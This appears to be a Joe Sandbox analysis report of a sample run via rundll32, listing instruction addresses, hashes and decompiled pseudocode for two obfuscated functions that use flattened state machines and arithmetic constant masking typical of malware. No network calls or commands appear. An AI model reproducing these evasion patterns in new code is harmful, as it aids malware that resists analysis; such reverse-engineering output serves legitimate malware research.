0x00000000
0x1003734b
0x10036a92
0x10036a92
0x10036a94
0x10036a9a
0x10036a9c
0x10036aa2
0x10036aa4
0x10036e84
0x10036e84
0x10036e86
0x10036e8c
0x10036e93
0x10036e99
0x10036e9b
0x10036eff
0x10036f01
0x10036f07
0x10036f0d
0x10036f0f
0x10036f15
0x10036f1c
0x10036f1c
0x10036f1e
0x10036f1e
0x10036f2b
0x10036f32
0x10036f38
0x10036f3b
0x10036f3c
0x10036f42
0x10036f42
0x10036f46
0x10036f48
0x10036f4e
0x10036f54
0x10036f57
0x00000000
0x10036f5d
0x10036f5d
0x10036f64
0x10036f64
0x10036f57
0x10036f48
0x10036f0f
0x10036e9d
0x10036e9d
0x10036e9f
0x10036ea5
0x10036eab
0x00000000
0x10036eab
0x10036e9b
0x10036aaa
0x10036aaa
0x10036aaa
0x10036aad
0x10036ab1
0x10036ab1
0x10036ab2
0x10036ac4
0x10036ad1
0x10036ae0
0x10036b0a
0x10036b0f
0x10036b15
0x10036b18
0x10036b1a
0x10036bec
0x10036bf2
0x10036cd6
0x10036cdc
0x10036ce2
0x10036ce2
0x10036ce2
0x10036ce5
0x10036ce7
0x10036ce7
0x10036ced
0x10036cf3
0x10036cf9
0x10036cfb
0x10036cfd
0x10036cfd
0x10036d03
0x10036d09
0x10036d0b
0x10036d17
0x10036d1d
0x10036d0d
0x10036d0d
0x10036d0f
0x10036d0f
0x10036d23
0x10036d25
0x10036d27
0x10036d27
0x10036d2d
0x10036d2f
0x10036d31
0x10036d37
0x10036d39
0x10036e3a
0x10036e3a
0x10036e40
0x10036e45
0x10036e45
0x10036e48
0x10036e49
0x00000000
0x10036d3f
0x10036d3f
0x10036d3f
0x10036d43
0x10036d63
0x10036d65
0x10036d67
0x10036d6d
0x10036d73
0x10036d75
0x10036e1c
0x10036e1c
0x10036e1f
0x00000000
0x10036e25
0x10036e25
0x10036e2b
0x00000000
0x10036e2b
0x10036d7b
0x10036d7b
0x10036d7b
0x10036d7e
0x00000000
0x00000000
0x10036d80
0x10036d82
0x10036d8a
0x10036d93
0x10036d93
0x10036d95
0x10036d95
0x10036da7
0x10036daa
0x10036db0
0x10036db9
0x10036dbc
0x10036dc9
0x10036dcc
0x10036dcd
0x10036dce
0x10036dd4
0x10036dd6
0x10036ddc
0x10036de2
0x00000000
0x00000000
0x00000000
0x00000000
0x10036de4
0x10036de4
0x10036de4
0x10036de6
0x00000000
0x00000000
0x10036de8
0x10036deb
0x10036eae
0x10036eae
0x10036eb0
0x10036eb5
0x10036ebb
0x10036ec1
0x10036ec2
0x00000000
0x10036df1
0x10036df1
0x10036df3
0x10036df5
0x10036df5
0x10036df5
0x10036dfd
0x10036e00
0x10036e00
0x10036e06
0x10036e08
0x10036e0a
0x10036e11
0x10036e17
0x10036e19
0x00000000
0x10036e19
0x00000000
0x10036deb
0x00000000
0x10036de4
0x00000000
0x10036d7b
0x10036d45
0x10036d45
0x10036d47
0x10036d4d
0x10036d55
0x10036d55
0x10036d58
0x10036d58
0x00000000
0x10036d47
0x00000000
0x10036e31
0x10036e31
0x10036e32
0x10036e32
0x00000000
0x10036d3f
0x10036bf8
0x10036bfe
0x10036c03
0x10036c0e
0x10036c15
0x10036c1b
0x10036c22
0x10036c23
0x10036c24
0x10036c29
0x10036c2f
0x10036c32
0x10036c34
0x10036c4e
0x10036c50
0x00000000
0x10036c56
0x10036c56
0x10036c5d
0x00000000
0x10036c63
0x10036c69
0x10036c6f
0x10036c71
0x10036c71
0x10036c73
0x10036c73
0x10036c7c
0x10036c83
0x10036c89
0x10036c8c
0x10036c8d
0x10036c8f
0x10036c8f
0x10036c97
0x10036c99
0x00000000
0x10036c9f
0x10036c9f
0x10036ca5
0x10036ca8
0x10036cbe
0x10036cc4
0x10036cca
0x10036ccb
0x10036ec8
0x10036ec8
0x10036ecf
0x10036ed0
0x10036ed1
0x10036ed6
0x10036ed9
0x10036caa
0x10036caa
0x10036cb1
0x00000000
0x10036cb1
0x10036ca8
0x10036c99
0x10036c5d
0x10036c36
0x10036c36
0x10036c3c
0x10036c42
0x10036c43
0x10036e4f
0x10036e4f
0x10036e56
0x10036e57
0x10036e58
0x10036e5d
0x10036e60
0x10036e60
0x10036e60
0x10036c34
0x10036b20
0x10036b20
0x10036b26
0x10036b28
0x10036b60
0x10036b62
0x00000000
0x10036b64
0x10036b64
0x10036b6b
0x00000000
0x10036b6d
0x10036b73
0x10036b75
0x10036b7b
0x10036b7b
0x10036b7d
0x10036b7d
0x10036b7f
0x10036b88
0x10036b8f
0x10036b92
0x10036b93
0x10036b95
0x10036b95
0x10036b9d
0x10036b9f
0x00000000
0x10036ba1
0x10036ba1
0x10036ba7
0x10036baa
0x10036bbd
0x10036bbe
0x10036bc4
0x10036bd0
0x10036bd7
0x10036bdc
0x10036bdd
0x10036be2
0x10036be5
0x00000000
0x10036bac
0x10036bac
0x10036bb3
0x00000000
0x10036bb3
0x10036baa
0x10036b9f
0x10036b6b
0x00000000
0x10036b2a
0x10036b2a
0x10036b2c
0x10036b2d
0x10036b33
0x10036b3f
0x10036b46
0x10036b4b
0x10036b4c
0x10036b51
0x10036b54
0x10036b54
0x10036b54
0x10036b56
0x10036b56
0x10036b56
0x10036e62
0x10036e62
0x10036e64
0x10036edd
0x10036ee4
0x10036ee4
0x10036ee4
0x10036eeb
0x10036eed
0x10036ef3
0x10036ef4
0x10037437
0x10037437
0x10037438
0x10037439
0x1003743e
0x00000000
0x00000000
0x00000000
0x00000000
0x10036e66
0x10036e6c
0x10036e6c
0x10036e72
0x10036e72
0x10036e7e
0x00000000
0x10036e7e
0x10036aa4
0x10037441
0x10037441
0x10037447
0x1003744d
0x10037453
0x10037455
0x10037457
0x1003745e
0x1003745e
0x10037460
0x10037460
0x10037469
0x1003746a
0x10037472
0x10037479
0x1003747c
0x1003747d
0x10037483
0x10037483
0x10037487
0x1003748d
0x1003748f
0x10037491
0x10037497
0x1003749a
0x100374ab
0x100374ad
0x100374ae
0x100374b4
0x100374c0
0x100374c7
0x100374c8
0x100374c9
0x100374ce
0x1003749c
0x1003749c
0x100374a3
0x100374a3
0x1003749a
0x1003748f
0x100374df
0x100374e6
0x100374ee
0x100374ef
0x100374f1
0x1003763d
0x1003763f
0x1003764f
0x10037652
0x10037654
0x00000000
0x10037641
0x10037647
0x00000000
0x10037647
0x00000000
0x100374f7
0x100374f7
0x100374fd
0x10037500
0x10037506
0x10037509
0x1003750f
0x10037515
0x10037517
0x10037519
0x1003751b
0x1003751b
0x1003751d
0x1003751d
0x1003752a
0x10037531
0x10037534
0x10037535
0x10037537
0x10037538
0x10037538
0x10037540
0x10037546
0x10037548
0x1003754e
0x10037550
0x10037556
0x10037559
0x10037614
0x10037615
0x1003761b
0x10037627
0x1003762e
0x1003762f
0x10037630
0x10037635
0x1003755f
0x10037565
0x1003756c
0x1003756c
0x1003756c
0x1003756c
0x10037559
0x10037572
0x10037572
0x10037578
0x10037578
0x10037578
0x1003757e
0x10037584
0x10037587
0x1003758d
0x1003758f
0x10037591
0x10037597
0x10037599
0x10037599
0x10037599
0x10037597
0x1003759e
0x1003759f
0x100375a1
0x100375a3
0x100375a3
0x100375a5
0x100375a7
0x100375ad
0x100375af
0x100375b5
0x100375b5
0x100375bb
0x100375bd
0x00000000
0x00000000
0x100375c3
0x100375c5
0x100375c7
0x100375c7
0x100375c9
0x100375c9
0x100375d9
0x100375e0
0x100375e3
0x100375e4
0x100375e6
0x100375e6
0x100375ea
0x100375f0
0x100375f2
0x100375f8
0x100375fe
0x10037601
0x1003765f
0x10037661
0x10037662
0x10037668
0x10037674
0x1003767b
0x1003767c
0x1003767d
0x10037682
0x10037603
0x10037603
0x1003760a
0x1003760a
0x10037601
0x10037693
0x10037698
0x100376a7
0x100376aa
0x100376b4
0x100376b4
0x100376b6
0x100376b8
0x100376be
0x100376c6
0x100376cc
0x100376ce
0x100376d4
0x100376d6
0x100376e3
0x100376d8
0x100376d8
0x100376df
0x100376df
0x100376e6
0x100376ec
0x100376ed
0x100376f3
0x100376f3
0x100376f8
0x100376fb
0x100376ff
0x100376ff
0x10037700
0x10037702
0x10037708
0x1003770e
0x00000000
0x00000000
0x00000000
0x1003770e
0x100375b5
0x10037714
0x10037716
0x10037719
0x1003771b
0x1003771e
0x10037724
0x00000000
0x10037724
0x100363ba
0x100363b1
0x100363a8
0x1003633d
0x10036342
0x1003634a
0x1003635e
0x10036363
0x10036367
0x10036367
0x1003636a
0x1003637a
0x10037789
0x1003778b
0x1003778c
0x1003778d
0x1003778e
0x1003778f
0x10037790
0x10037795
0x10037798
0x1003779b
0x1003779c
0x1003779f
0x100377a1
0x100377a7
0x100377aa
0x100377ac
0x100377c1
0x100377c2
0x100377c5
0x100377c7
0x100377dd
0x100377e3
0x100377eb
0x100377ed
0x100377f8
0x100377fb
0x10037812
0x100377fd
0x100377fd
0x10037802
0x00000000
0x10037802
0x100377ef
0x100377ef
0x100377f4
0x10037804
0x10037804
0x10037805
0x10037807
0x1003780c
0x1003780c
0x100377c9
0x100377c9
0x100377cc
0x00000000
0x100377ce
0x100377d1
0x100377d9
0x100377d9
0x100377cc
0x100377ae
0x100377ae
0x100377b5
0x100377b6
0x100377b8
0x100377bd
0x100377bd
0x100377a3
0x100377a3
0x100377a3
0x10037816
0x10036380
0x10037762
0x10037762
0x1003776b
0x10037774
0x10037779
0x10037788
0x10037788
0x00000000
0x00000000
0x00000000
0x1003634a

APIs

__floor_pentium4.LIBCMT ref: 1003644B

Strings

1#QNAN, xrefs: 1003773C
1#IND, xrefs: 10037728
1#SNAN, xrefs: 10037732
1#INF, xrefs: 10037746

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: bbceed1c2936b7684a965e352f22890cd8bf915d81af51421f0a700764367250
Instruction ID: a3cbde3b429370e976e6b7797652e40458841655e88b9989e52ada4887f9fce3
Opcode Fuzzy Hash: bbceed1c2936b7684a965e352f22890cd8bf915d81af51421f0a700764367250
Instruction Fuzzy Hash: 00D21571E086298FDB66CE28CD407DAB7F5FB49346F1541EAD80DEA240E774AE818F41

Uniqueness

Uniqueness Score: -1.00%

Function 0021A0AF, Relevance: 9.0, Strings: 7, Instructions: 283
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0021A0AF(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t237;
				void* _t251;
				void* _t256;
				short _t257;
				void* _t258;
				void* _t262;
				signed int _t268;
				signed int _t269;
				void* _t271;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				intOrPtr _t319;
				signed int _t320;
				signed int _t323;
				signed int* _t325;
				void* _t327;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0020602B(_t237);
				_v8 = _v8 & 0x00000000;
				_t325 =  &(( &_v108)[4]);
				_v36 = 0x3ea4;
				_v36 = _v36 >> 7;
				_t271 = 0x1d995f52;
				_v36 = _v36 ^ 0x0000fd94;
				_v100 = 0xb5d8;
				_t313 = 0x12;
				_v100 = _v100 / _t313;
				_v100 = _v100 + 0xffffd667;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xffc12715;
				_v44 = 0xa7b5;
				_v44 = _v44 + 0x5ef4;
				_v44 = _v44 ^ 0x00014b95;
				_v48 = 0x9389;
				_v48 = _v48 + 0xb0ba;
				_v48 = _v48 ^ 0x000118ce;
				_v88 = 0x5fea;
				_t314 = 0x1c;
				_v88 = _v88 * 0x7c;
				_v88 = _v88 ^ 0x636ec63e;
				_v88 = _v88 ^ 0x63409d32;
				_v16 = 0x76ea;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x000ec3ec;
				_v20 = 0x91aa;
				_v20 = _v20 | 0x0edf39e6;
				_v20 = _v20 ^ 0x0edfdf8b;
				_v52 = 0xaa70;
				_v52 = _v52 + 0x8ed4;
				_v52 = _v52 ^ 0x00017b8d;
				_v104 = 0xa114;
				_v104 = _v104 >> 5;
				_v104 = _v104 << 0xc;
				_v104 = _v104 / _t314;
				_v104 = _v104 ^ 0x0002b555;
				_v108 = 0xd093;
				_v108 = _v108 << 0xa;
				_t315 = 0x69;
				_v108 = _v108 * 0x4a;
				_v108 = _v108 / _t315;
				_v108 = _v108 ^ 0x024bf4a9;
				_v80 = 0x5298;
				_v80 = _v80 | 0xf2bddfef;
				_v80 = _v80 ^ 0xf2bdee35;
				_v84 = 0xad61;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x5376a172;
				_v84 = _v84 ^ 0x535d9bb3;
				_v96 = 0xfad4;
				_v96 = _v96 + 0xc0fb;
				_t316 = 0x75;
				_v96 = _v96 / _t316;
				_t317 = 0x41;
				_t323 = _a8;
				_v96 = _v96 / _t317;
				_v96 = _v96 ^ 0x00007e63;
				_v40 = 0x6cc;
				_v40 = _v40 + 0x5321;
				_v40 = _v40 ^ 0x00002fe7;
				_v76 = 0xe38c;
				_v76 = _v76 + 0x66b4;
				_v76 = _v76 >> 5;
				_v76 = _v76 ^ 0x00001a53;
				_v68 = 0xaffd;
				_v68 = _v68 + 0x9b0e;
				_v68 = _v68 ^ 0x74692a2f;
				_v68 = _v68 ^ 0x74685d67;
				_v92 = 0xd493;
				_v92 = _v92 >> 5;
				_v92 = _v92 + 0xffffb819;
				_v92 = _v92 << 3;
				_v92 = _v92 ^ 0xfffdea97;
				_v32 = 0x61b7;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00001b97;
				_v72 = 0x8555;
				_v72 = _v72 >> 6;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x00005e98;
				_v64 = 0xfd5d;
				_v64 = _v64 ^ 0xfb760f92;
				_v64 = _v64 + 0xe44c;
				_v64 = _v64 ^ 0xfb77c0e2;
				_v24 = 0xfd78;
				_v24 = _v24 ^ 0x534e19f9;
				_v24 = _v24 ^ 0x534eb204;
				_v28 = 0xae38;
				_v28 = _v28 ^ 0x0fcca386;
				_v28 = _v28 ^ 0x0fcc33c1;
				_t268 = _a8;
				_v56 = 0x9a6f;
				_v56 = _v56 | 0xcfdc8d68;
				_v56 = _v56 ^ 0xf237fb5d;
				_v56 = _v56 ^ 0x3deb56e2;
				_v12 = 0xde50;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x0de56132;
				_v60 = 0x8399;
				_v60 = _v60 ^ 0x95508e48;
				_v60 = _v60 ^ 0xc724022f;
				_v60 = _v60 ^ 0x52742192;
				while(1) {
					L1:
					_t251 = 0x10ef006b;
					do {
						while(1) {
							L2:
							_t327 = _t271 - 0x1d995f52;
							if(_t327 > 0) {
								break;
							}
							if(_t327 == 0) {
								_t271 = 0x1679d154;
								continue;
							} else {
								if(_t271 == 0x829cfc0) {
									_t311 = _v8;
									if(_t311 != 0) {
										do {
											_t320 =  *((intOrPtr*)(_t311 + 0x220));
											E0020F536(_v56, _v12, _v60, _t311);
											_t311 = _t320;
										} while (_t320 != 0);
									}
								} else {
									if(_t271 == _t251) {
										_t312 = _v8;
										_t268 = 0;
										if(_t312 != 0) {
											do {
												E00206636(_t268 * 2 + _t323, _v80, _v84, _v96, _t312 + 0xc);
												_t256 = E00210ADC(_t312 + 0xc, _v40, _v76);
												_t325 =  &(_t325[4]);
												_t269 = _t268 + _t256;
												_t257 = 0x2c;
												 *((short*)(_t323 + _t269 * 2)) = _t257;
												_t268 = _t269 + 1;
												_t312 =  *((intOrPtr*)(_t312 + 0x220));
											} while (_t312 != 0);
											_t251 = 0x10ef006b;
										}
										_t319 = _v4;
										_t271 = 0x33a3af6e;
										_t310 = _a8;
										continue;
									} else {
										if(_t271 == 0x1679d154) {
											E00215A61( &_v8, E00218D1C, _v44, _v48, _v88);
											_t325 =  &(_t325[4]);
											_t271 = 0x20b4c829;
											while(1) {
												L1:
												_t251 = 0x10ef006b;
												goto L2;
											}
										} else {
											if(_t271 != 0x19514a0a) {
												goto L24;
											} else {
												_push(_t271);
												_push(_t271);
												_t323 = E00208736(_t319 + _t319);
												_t251 = 0x10ef006b;
												_t271 =  !=  ? 0x10ef006b : 0x829cfc0;
												continue;
											}
										}
									}
								}
							}
							L28:
							return 0 |  *_a8 != 0x00000000;
						}
						if(_t271 == 0x20b4c829) {
							_t309 = _v8;
							_t319 = 0;
							_v4 = 0;
							if(_t309 != 0) {
								do {
									_t258 = E00210ADC(_t309 + 0xc, _v16, _v20);
									_t309 =  *(_t309 + 0x220);
									_t319 = _t319 + 1 + _t258;
								} while (_t309 != 0);
								_v4 = _t319;
								_t251 = 0x10ef006b;
							}
							_t310 = _a8;
							_t271 = 0x19514a0a;
							goto L24;
						} else {
							if(_t271 == 0x2b3a1c97) {
								E0020F536(_v64, _v24, _v28, _t323);
								_t271 = 0x829cfc0;
								goto L1;
							} else {
								if(_t271 != 0x33a3af6e) {
									goto L24;
								} else {
									_t260 = _t310 + 4;
									 *(_t310 + 4) =  *(_t310 + 4) & 0x00000000;
									_t262 = E00215D1D(_v68, _v92, _v32, _v72, _t268 - 1, _t323, _v36, _t260);
									_t325 =  &(_t325[6]);
									 *_t310 = _t262;
									_t271 = 0x2b3a1c97;
									while(1) {
										L1:
										_t251 = 0x10ef006b;
										goto L2;
									}
								}
							}
						}
						goto L28;
						L24:
					} while (_t271 != 0x202e1177);
					goto L28;
				}
			}

0x0021a0bd
0x0021a0be
0x0021a0c5
0x0021a0c6
0x0021a0c7
0x0021a0cc
0x0021a0d4
0x0021a0d7
0x0021a0e1
0x0021a0e6
0x0021a0eb
0x0021a0f3
0x0021a101
0x0021a106
0x0021a10c
0x0021a114
0x0021a119
0x0021a121
0x0021a129
0x0021a131
0x0021a139
0x0021a141
0x0021a149
0x0021a151
0x0021a15e
0x0021a161
0x0021a165
0x0021a16d
0x0021a175
0x0021a17d
0x0021a182
0x0021a18a
0x0021a192
0x0021a19a
0x0021a1a2
0x0021a1aa
0x0021a1b2
0x0021a1ba
0x0021a1c2
0x0021a1c7
0x0021a1d4
0x0021a1d8
0x0021a1e0
0x0021a1e8
0x0021a1f2
0x0021a1f5
0x0021a201
0x0021a205
0x0021a20d
0x0021a215
0x0021a21d
0x0021a225
0x0021a22d
0x0021a232
0x0021a23a
0x0021a242
0x0021a24a
0x0021a256
0x0021a259
0x0021a265
0x0021a268
0x0021a26f
0x0021a273
0x0021a27b
0x0021a283
0x0021a28b
0x0021a293
0x0021a29b
0x0021a2a3
0x0021a2a8
0x0021a2b0
0x0021a2b8
0x0021a2c0
0x0021a2c8
0x0021a2d0
0x0021a2d8
0x0021a2dd
0x0021a2e5
0x0021a2ea
0x0021a2f2
0x0021a2fa
0x0021a2ff
0x0021a307
0x0021a30f
0x0021a314
0x0021a319
0x0021a321
0x0021a329
0x0021a331
0x0021a339
0x0021a341
0x0021a349
0x0021a351
0x0021a359
0x0021a361
0x0021a369
0x0021a371
0x0021a37c
0x0021a384
0x0021a38c
0x0021a394
0x0021a39c
0x0021a3a4
0x0021a3a9
0x0021a3b1
0x0021a3b9
0x0021a3c1
0x0021a3c9
0x0021a3d1
0x0021a3d1
0x0021a3d1
0x0021a3d6
0x0021a3d6
0x0021a3d6
0x0021a3d6
0x0021a3dc
0x00000000
0x00000000
0x0021a3e2
0x0021a4cb
0x00000000
0x0021a3e8
0x0021a3ee
0x0021a592
0x0021a598
0x0021a59a
0x0021a59a
0x0021a5ad
0x0021a5b2
0x0021a5b6
0x0021a59a
0x0021a3f4
0x0021a3f6
0x0021a462
0x0021a466
0x0021a46a
0x0021a46c
0x0021a485
0x0021a494
0x0021a499
0x0021a49c
0x0021a4a0
0x0021a4a1
0x0021a4a6
0x0021a4a7
0x0021a4ad
0x0021a4b1
0x0021a4b1
0x0021a4b6
0x0021a4ba
0x0021a4bf
0x00000000
0x0021a3f8
0x0021a3fe
0x0021a450
0x0021a455
0x0021a458
0x0021a3d1
0x0021a3d1
0x0021a3d1
0x00000000
0x0021a3d1
0x0021a400
0x0021a406
0x00000000
0x0021a40c
0x0021a418
0x0021a419
0x0021a423
0x0021a425
0x0021a432
0x00000000
0x0021a432
0x0021a406
0x0021a3fe
0x0021a3f6
0x0021a3ee
0x0021a5ba
0x0021a5cf
0x0021a5cf
0x0021a4db
0x0021a543
0x0021a547
0x0021a549
0x0021a54f
0x0021a551
0x0021a55c
0x0021a561
0x0021a568
0x0021a56b
0x0021a56f
0x0021a573
0x0021a573
0x0021a578
0x0021a57f
0x00000000
0x0021a4dd
0x0021a4e3
0x0021a532
0x0021a539
0x00000000
0x0021a4e5
0x0021a4eb
0x00000000
0x0021a4f1
0x0021a4f1
0x0021a4f4
0x0021a511
0x0021a516
0x0021a519
0x0021a51b
0x0021a3d1
0x0021a3d1
0x0021a3d1
0x00000000
0x0021a3d1
0x0021a3d1
0x0021a4eb
0x0021a4e3
0x00000000
0x0021a584
0x0021a584
0x00000000
0x0021a590

Strings

/, xrefs: 0021A28B
g]ht, xrefs: 0021A2C8
c~, xrefs: 0021A273
2a, xrefs: 0021A3A9
L, xrefs: 0021A331
_, xrefs: 0021A151
V=, xrefs: 0021A394

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 2a$L$c~$g]ht$/$V=$_
API String ID: 0-445983283
Opcode ID: 2f8a43af7f06ca167d6f3ba2045fb9614555b0bcdc9e170dbced99858f140ad5
Instruction ID: 45c51a82ac5c22f3f5a89eeeb3ad77d01c40a054ce30f0fb746e9089bfa28f76
Opcode Fuzzy Hash: 2f8a43af7f06ca167d6f3ba2045fb9614555b0bcdc9e170dbced99858f140ad5
Instruction Fuzzy Hash: 29D183725197819FD368CF21C089A5BBBE2FFD4718F60890CF596862A0C7B49959CF83

Uniqueness

Uniqueness Score: -1.00%

Function 002069A0, Relevance: 9.0, Strings: 7, Instructions: 215
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002069A0(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* __edi;
				void* __ebp;
				void* _t182;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t191;
				intOrPtr _t192;
				intOrPtr* _t193;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t198;
				void* _t199;
				void* _t218;
				intOrPtr _t222;
				void* _t223;
				intOrPtr _t227;
				signed int* _t228;

				_t228 =  &_v84;
				_v8 = 0x71163c;
				_t222 = 0;
				_t193 = __edx;
				_v4 = 0;
				_v44 = 0xc562;
				_t227 = __ecx;
				_v44 = _v44 >> 2;
				_t223 = 0xa9ba57f;
				_v44 = _v44 ^ 0x8749252f;
				_v44 = _v44 ^ 0x87491d9f;
				_v16 = 0x2187;
				_v16 = _v16 + 0x9003;
				_v16 = _v16 ^ 0x00009583;
				_v64 = 0x884c;
				_v64 = _v64 ^ 0x157bb051;
				_t195 = 0x5b;
				_v64 = _v64 / _t195;
				_v64 = _v64 + 0xffffc6fd;
				_v64 = _v64 ^ 0x003c6beb;
				_v76 = 0xc2af;
				_t196 = 0x62;
				_v76 = _v76 / _t196;
				_v76 = _v76 << 0xb;
				_v76 = _v76 + 0xffffe747;
				_v76 = _v76 ^ 0x000fbc5b;
				_v20 = 0xd86f;
				_v20 = _v20 << 0xb;
				_v20 = _v20 ^ 0x06c32379;
				_v24 = 0x5847;
				_v24 = _v24 ^ 0xbe016602;
				_v24 = _v24 ^ 0xbe0159ab;
				_v56 = 0x8b9e;
				_v56 = _v56 << 8;
				_v56 = _v56 ^ 0x62eb1469;
				_v56 = _v56 ^ 0x62609790;
				_v60 = 0xc8f5;
				_v60 = _v60 | 0xe944ef36;
				_v60 = _v60 ^ 0xbc6be2e2;
				_v60 = _v60 ^ 0x552f2627;
				_v84 = 0x43ed;
				_v84 = _v84 ^ 0x08a0b069;
				_v84 = _v84 | 0x0c951c83;
				_v84 = _v84 + 0x562e;
				_v84 = _v84 ^ 0x0cb6752c;
				_v48 = 0x4b81;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 + 0xffff2892;
				_v48 = _v48 ^ 0xffff31fe;
				_v80 = 0x3016;
				_v80 = _v80 + 0x7dde;
				_v80 = _v80 << 0xf;
				_t197 = 0x36;
				_v80 = _v80 / _t197;
				_v80 = _v80 ^ 0x019c7f33;
				_v52 = 0xfd2;
				_v52 = _v52 + 0xffff2d18;
				_v52 = _v52 + 0x6a3f;
				_v52 = _v52 ^ 0xffffabb5;
				_v28 = 0xa77b;
				_v28 = _v28 ^ 0xae749dbd;
				_v28 = _v28 ^ 0xae743f32;
				_v32 = 0xf75f;
				_v32 = _v32 | 0x58371397;
				_v32 = _v32 ^ 0x5837ee79;
				_v68 = 0x3d22;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 << 0xf;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x00007889;
				_v72 = 0xcbcf;
				_v72 = _v72 | 0x3a65856e;
				_v72 = _v72 + 0xdb4;
				_v72 = _v72 | 0x1789f940;
				_v72 = _v72 ^ 0x3feda3a8;
				_v36 = 0x2389;
				_v36 = _v36 * 0x4b;
				_v36 = _v36 | 0x61940fa3;
				_v36 = _v36 ^ 0x619e1b1f;
				_v40 = 0xa903;
				_v40 = _v40 + 0x4cf2;
				_v40 = _v40 | 0xc82713d6;
				_v40 = _v40 ^ 0xc827b671;
				_v12 = 0xc1c;
				_v12 = _v12 ^ 0x8bcf36f0;
				_v12 = _v12 ^ 0x8bcf5121;
				while(1) {
					L1:
					_t198 = 0x374e1c43;
					_t182 = 0x15aea868;
					L2:
					while(1) {
						do {
							if(_t223 == 0xa9ba57f) {
								_push(_t198);
								_push(_t198);
								_t199 = 0x38;
								_t222 = E00208736(_t199);
								__eflags = _t222;
								if(__eflags == 0) {
									_t223 = 0x3a1f14a3;
									_t182 = 0x15aea868;
									_t198 = 0x374e1c43;
									_t218 = 0x28fd42b4;
									goto L19;
								}
								_t223 = 0x2094e6da;
								L15:
								_t182 = 0x15aea868;
								L11:
								_t198 = 0x374e1c43;
								L12:
								_t218 = 0x28fd42b4;
								continue;
							}
							if(_t223 == 0xb1cacb5) {
								return E0020F536(_v36, _v40, _v12, _t222);
							}
							if(_t223 == _t182) {
								 *((intOrPtr*)(_t222 + 0x24)) = _t227;
								_t188 =  *0x21ca24; // 0x0
								 *((intOrPtr*)(_t222 + 0x2c)) = _t188;
								 *0x21ca24 = _t222;
								return _t188;
							}
							if(_t223 == 0x16c9d000) {
								E0021422C(_v68,  *((intOrPtr*)(_t222 + 0x28)), _v72);
								_t223 = 0xb1cacb5;
								goto L15;
							}
							if(_t223 == 0x2094e6da) {
								_push(_v24);
								_t190 = E00216DB9( *((intOrPtr*)(_t193 + 4)), _t222, _t227, __eflags, _t198,  *_t193, _v76, _v20);
								_t228 =  &(_t228[5]);
								 *((intOrPtr*)(_t222 + 0x28)) = _t190;
								__eflags = _t190;
								_t198 = 0x374e1c43;
								_t182 = 0x15aea868;
								_t223 =  !=  ? 0x374e1c43 : 0xb1cacb5;
								goto L12;
							}
							if(_t223 == _t218) {
								_push(_t198);
								_t191 = E00201132(_v48, _t198, _v80, _t198, _t222, _v52, _v28, _v32, E00219586);
								_t228 =  &(_t228[9]);
								 *((intOrPtr*)(_t222 + 0x1c)) = _t191;
								__eflags = _t191;
								_t182 = 0x15aea868;
								_t223 =  !=  ? 0x15aea868 : 0x16c9d000;
								goto L11;
							}
							if(_t223 != _t198) {
								goto L19;
							}
							_t192 = E002076DB( *((intOrPtr*)(_t222 + 0x28)), _v56, _v60, _v84);
							_t228 =  &(_t228[2]);
							 *((intOrPtr*)(_t222 + 4)) = _t192;
							_t218 = 0x28fd42b4;
							_t223 =  !=  ? 0x28fd42b4 : 0x16c9d000;
							goto L1;
							L19:
							__eflags = _t223 - 0x3a1f14a3;
						} while (__eflags != 0);
						return _t182;
					}
				}
			}

0x002069a0
0x002069a3
0x002069af
0x002069b1
0x002069b3
0x002069b9
0x002069c1
0x002069c3
